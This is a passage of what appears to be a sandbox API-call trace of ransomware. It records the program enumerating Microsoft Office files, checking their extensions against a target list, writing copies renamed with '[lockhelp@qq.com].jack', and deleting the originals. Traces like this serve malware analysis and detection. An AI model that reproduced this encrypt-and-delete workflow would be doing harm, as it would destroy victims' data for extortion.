Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.324] lstrlenW (lpString=".zip") returned 4 [0207.324] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.325] lstrlenW (lpString=".rar") returned 4 [0207.325] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString=".bz2") returned 4 [0207.325] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString=".7z") returned 3 [0207.325] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.325] lstrlenW (lpString=".dbf") returned 4 [0207.325] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.325] lstrlenW (lpString=".1cd") returned 4 [0207.325] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.325] lstrlenW (lpString=".jpg") returned 4 [0207.325] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.325] lstrlenW (lpString=".doc") returned 4 [0207.325] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString=".docx") returned 5 [0207.325] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.325] lstrlenW (lpString=".pdf") returned 4 [0207.325] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString=".xls") returned 4 [0207.325] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.325] lstrlenW (lpString=".xlsx") returned 5 [0207.325] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.325] lstrlenW (lpString=".ppt") returned 4 [0207.326] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.326] lstrlenW (lpString=".zip") returned 4 [0207.326] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.326] lstrlenW (lpString=".rar") returned 4 [0207.326] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.326] lstrlenW (lpString=".bz2") returned 4 [0207.326] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.326] lstrlenW (lpString=".7z") returned 3 [0207.326] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.326] lstrlenW (lpString=".dbf") returned 4 [0207.326] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.326] lstrlenW (lpString=".1cd") returned 4 [0207.326] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.326] lstrlenW (lpString=".jpg") returned 4 [0207.326] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.326] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0207.326] lstrlenW (lpString="AppXManifestLoc.en-us.xml") returned 25 [0207.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.327] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=9831) returned 1 [0207.327] CloseHandle (hObject=0x3f4) returned 1 [0207.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 0x220 [0207.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.327] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.327] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.328] GetLastError () returned 0x0 [0207.328] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x2667, lpOverlapped=0x0) returned 1 [0207.453] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x2670, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x2670, lpOverlapped=0x0) returned 1 [0207.454] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.454] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x106, lpOverlapped=0x0) returned 1 [0207.454] SetEndOfFile (hFile=0x418) returned 1 [0207.455] CloseHandle (hObject=0x418) returned 1 [0207.457] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.457] SetEndOfFile (hFile=0x3f4) returned 1 [0207.458] CloseHandle (hObject=0x3f4) returned 1 [0207.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 1 [0207.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.458] lstrlenW (lpString=".doc") returned 4 [0207.458] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".docx") returned 5 [0207.459] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0207.459] lstrlenW (lpString=".pdf") returned 4 [0207.459] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".xls") returned 4 [0207.459] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".xlsx") returned 5 [0207.459] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0207.459] lstrlenW (lpString=".ppt") returned 4 [0207.459] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString=".zip") returned 4 [0207.459] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.459] lstrlenW (lpString=".rar") returned 4 [0207.459] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".bz2") returned 4 [0207.459] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".7z") returned 3 [0207.459] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString=".dbf") returned 4 [0207.459] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString=".1cd") returned 4 [0207.459] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString=".jpg") returned 4 [0207.459] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.459] lstrlenW (lpString=".doc") returned 4 [0207.459] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".docx") returned 5 [0207.459] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0207.459] lstrlenW (lpString=".pdf") returned 4 [0207.459] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.459] lstrlenW (lpString=".xls") returned 4 [0207.460] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString=".xlsx") returned 5 [0207.460] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0207.460] lstrlenW (lpString=".ppt") returned 4 [0207.460] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.460] lstrlenW (lpString=".zip") returned 4 [0207.460] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.460] lstrlenW (lpString=".rar") returned 4 [0207.460] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString=".bz2") returned 4 [0207.460] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString=".7z") returned 3 [0207.460] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.460] lstrlenW (lpString=".dbf") returned 4 [0207.460] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.460] lstrlenW (lpString=".1cd") returned 4 [0207.460] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0207.460] lstrlenW (lpString=".jpg") returned 4 [0207.460] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.460] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.460] lstrlenW (lpString="AG00021_.GIF") returned 12 [0207.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.461] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=14873) returned 1 [0207.461] CloseHandle (hObject=0x3f4) returned 1 [0207.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 0x220 [0207.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.461] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.461] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.461] GetLastError () returned 0x0 [0207.461] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x3a19, lpOverlapped=0x0) returned 1 [0207.559] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x3a20, lpOverlapped=0x0) returned 1 [0207.561] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.561] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0207.565] SetEndOfFile (hFile=0x418) returned 1 [0207.566] CloseHandle (hObject=0x418) returned 1 [0207.569] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.569] SetEndOfFile (hFile=0x3f4) returned 1 [0207.570] CloseHandle (hObject=0x3f4) returned 1 [0207.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0207.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.571] lstrlenW (lpString=".doc") returned 4 [0207.571] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.571] lstrlenW (lpString=".docx") returned 5 [0207.571] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.571] lstrlenW (lpString=".pdf") returned 4 [0207.571] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.571] lstrlenW (lpString=".xls") returned 4 [0207.571] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.571] lstrlenW (lpString=".xlsx") returned 5 [0207.571] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.571] lstrlenW (lpString=".ppt") returned 4 [0207.571] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.571] lstrlenW (lpString=".zip") returned 4 [0207.571] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.571] lstrlenW (lpString=".rar") returned 4 [0207.571] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.571] lstrlenW (lpString=".bz2") returned 4 [0207.571] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.571] lstrlenW (lpString=".7z") returned 3 [0207.571] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.571] lstrlenW (lpString=".dbf") returned 4 [0207.571] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".1cd") returned 4 [0207.572] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".jpg") returned 4 [0207.572] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".doc") returned 4 [0207.572] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.572] lstrlenW (lpString=".docx") returned 5 [0207.572] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.572] lstrlenW (lpString=".pdf") returned 4 [0207.572] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString=".xls") returned 4 [0207.572] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString=".xlsx") returned 5 [0207.572] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.572] lstrlenW (lpString=".ppt") returned 4 [0207.572] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".zip") returned 4 [0207.572] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString=".rar") returned 4 [0207.572] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.572] lstrlenW (lpString=".bz2") returned 4 [0207.572] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.572] lstrlenW (lpString=".7z") returned 3 [0207.572] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".dbf") returned 4 [0207.572] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".1cd") returned 4 [0207.572] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0207.572] lstrlenW (lpString=".jpg") returned 4 [0207.573] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.573] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.573] lstrlenW (lpString="AG00052_.GIF") returned 12 [0207.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.574] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=7686) returned 1 [0207.574] CloseHandle (hObject=0x3f4) returned 1 [0207.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 0x220 [0207.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.574] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.574] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.574] GetLastError () returned 0x0 [0207.574] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1e06, lpOverlapped=0x0) returned 1 [0207.684] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x1e10, lpOverlapped=0x0) returned 1 [0207.685] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.685] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0207.685] SetEndOfFile (hFile=0x418) returned 1 [0207.685] CloseHandle (hObject=0x418) returned 1 [0207.686] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.686] SetEndOfFile (hFile=0x3f4) returned 1 [0207.687] CloseHandle (hObject=0x3f4) returned 1 [0207.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0207.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.687] lstrlenW (lpString=".doc") returned 4 [0207.688] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.688] lstrlenW (lpString=".docx") returned 5 [0207.688] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.688] lstrlenW (lpString=".pdf") returned 4 [0207.688] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString=".xls") returned 4 [0207.688] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString=".xlsx") returned 5 [0207.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.688] lstrlenW (lpString=".ppt") returned 4 [0207.688] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString=".zip") returned 4 [0207.688] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString=".rar") returned 4 [0207.688] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString=".bz2") returned 4 [0207.688] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.688] lstrlenW (lpString=".7z") returned 3 [0207.688] lstrcmpiW 